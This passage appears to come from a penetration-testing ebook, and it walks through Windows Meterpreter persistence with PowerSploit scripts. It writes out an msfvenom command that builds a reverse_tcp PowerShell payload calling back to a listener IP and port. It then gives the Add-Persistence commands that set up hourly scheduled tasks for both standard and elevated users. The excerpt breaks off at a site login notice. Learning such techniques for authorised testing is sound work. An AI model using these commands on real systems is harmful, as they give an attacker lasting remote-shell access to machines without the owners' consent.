Configuring and executing meterpreter persistence

Now we're ready to build our gift to the world. First, we need to understand how these three scripts work. They're not individual tools that you pick and choose from as needed; they are all one tool. To create any persistent script, you'll need to run all three in a particular order:

  • New-UserPersistenceOption and New-ElevatedPersistenceOption must be executed first. The order doesn't matter as long as it's before the final script, Add-Persistence. These two scripts are used to define the persistence specifics that will make it into the final product. Why two? Because you're telling your payload how to handle being either a standard user or a privileged user. Perhaps you want to configure these settings differently depending on if an administrator runs it or not. For now, we'll just make the settings the same for both.
  • Add-Persistence needs the configuration defined in the first two scripts. These are passed to Add-Persistence as environment variables of your choosing.

Clear as mud? Let's dive in. First, we need a payload. What's nice about this is that any ol' PowerShell script will do fine. Maybe you have a favorite from our earlier review of PowerShell. Perhaps you typed up your own. For now, we'll generate an example with the ever-useful msfvenom. One of the format options is PowerShell!

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.154.131 LPORT=8008 -f psh > attack.ps1

Get that script to your script builder system (I used SimpleHTTPServer again; I just love that thing). Don't take it to your target; we don't have our persistent script just yet.

If you only have access to one Windows 7 box, your script builder and target are the same system.

Now we run the three scripts: the two option scripts with output stored as environment variables, and then the persistence script with the options pulled in and the payload script defined:

> $userop = New-UserPersistenceOption -ScheduledTask -Hourly
> $suop = New-ElevatedPersistenceOption -ScheduledTask -Hourly
> Add-Persistence -FilePath .attack.ps1 -ElevatedPersistenceOption $suop -UserPersistenceOption $userop

You can run ls or dir when you're done to verify that it worked. You should see two new scripts: Persistence.ps1 and RemovePersistence.ps1. The latter is for cleaning up your mess, should you need it. This will be important in a pen test, so don't lose that file! Get Persistence.ps1 over to your target.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.119.111.9